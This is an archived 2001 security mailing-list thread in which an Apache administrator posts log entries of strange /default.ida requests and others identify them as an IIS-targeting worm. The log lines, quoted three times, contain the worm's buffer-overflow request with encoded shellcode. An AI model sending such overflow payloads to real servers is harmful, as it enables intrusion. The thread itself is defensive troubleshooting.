Mailinglist Archive: opensuse-security (343 mails)

< Previous Next >
RE: [suse-security] Strange HTTP requests
  • From: <dog@xxxxxxxxx>
  • Date: Fri, 20 Jul 2001 08:05:10 -0500 (CDT)
  • Message-id: <Pine.LNX.4.31.0107200804140.15869-100000@xxxxxxxxxxxxx>
its a worm that generates random ips and does a scan of port 80 on the ip
then tries to infect it if it finds a web server. worm doesnt check to
see what version of web server is.

On Fri, 20 Jul 2001, Lars Schlimpert wrote:

>i have this default.ida requests too!
>but we running apache and roxen server only.
>what for stupid guys try this IIS exploid on apache or roxen? *rofl*
>
>tia, lars s.
>
>> -----Original Message-----
>> From: dog@xxxxxxxxx [mailto:dog@xxxxxxxxx]
>> Sent: Friday, July 20, 2001 6:08 AM
>> To: michael.ryan@xxxxxxxx
>> Cc: suse-security@xxxxxxxx
>> Subject: Re: [suse-security] Strange HTTP requests
>>
>>
>> this only affects microsoft internet information server (iis) you have
>> nothing to worry about if you are only running apache.
>>
>> On Thu, 19 Jul 2001 michael.ryan@xxxxxxxx wrote:
>>
>> >
>> >
>> >... on the same thread ... are there any known
>> exploits/vulnerabilities for
>> >Apache 1.3.12 running on SuSE?
>> >(The only issue I found on
>> >http://www.suse.com/us/support/security/index.html was dated
>> 07-09-2000 and
>> >just required a minor edit to httpd.conf)
>> >should I upgrade to 1.3.19 anyway?
>> >
>> >TIA
>> >Michael
>> >
>> >
>> >
>> >
>> > Lars Trebing
>> > <ltrebing@ltr To: SuSE Security
>> Mailing List <suse-security@xxxxxxxx>
>> > ebing.de> cc:
>> > Subject:
>> [suse-security] Strange HTTP requests
>> > 07/19/2001
>> > 07:46 PM
>> >
>> >
>> >
>> >
>> >
>> >
>> >Hello everyone,
>> >
>> >My Apache has just got three strange requests from three different
>> >addresses:
>> >
>> >63.149.209.133 - - [19/Jul/2001:18:55:47 +0200] "GET
>> >/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
>NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN> NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%
>> u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%
>> u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
>> >
>> >HTTP/1.0" 400 315
>> >209.215.117.8 - - [19/Jul/2001:19:14:28 +0200] "GET
>> >/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
>NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN> NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%
>> u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%
>> u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
>> >
>> >HTTP/1.0" 400 315
>> >161.184.88.254 - - [19/Jul/2001:19:21:18 +0200] "GET
>> >/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
>NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN> NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%
>> u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%
>> u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
>> >
>> >HTTP/1.0" 400 315
>> >
>> >Might this perhaps be an attack for a known bug of some HTTP server?
>> >Should I maybe even worry about this? (I am running Apache 1.3.12).
>> >
>> >By the way, I performed the same request locally and got a 404 error
>> >instead of the 400s reported in the log.
>> >
>> >TIA, Lars
>> >
>> >--
>> >To unsubscribe, e-mail: suse-security-unsubscribe@xxxxxxxx
>> >For additional commands, e-mail: suse-security-help@xxxxxxxx
>> >
>> >
>> >
>> >
>> >
>> >--
>> >To unsubscribe, e-mail: suse-security-unsubscribe@xxxxxxxx
>> >For additional commands, e-mail: suse-security-help@xxxxxxxx
>> >
>>
>> Chad Whitten
>> Network/Systems Administrator
>> Nexband Communications
>> chadwick@xxxxxxxxxxx
>>
>>
>> --
>> To unsubscribe, e-mail: suse-security-unsubscribe@xxxxxxxx
>> For additional commands, e-mail: suse-security-help@xxxxxxxx
>>
>
>
>--
>To unsubscribe, e-mail: suse-security-unsubscribe@xxxxxxxx
>For additional commands, e-mail: suse-security-help@xxxxxxxx
>

Chad Whitten
Network/Systems Administrator
Nexband Communications
chadwick@xxxxxxxxxxx


< Previous Next >
References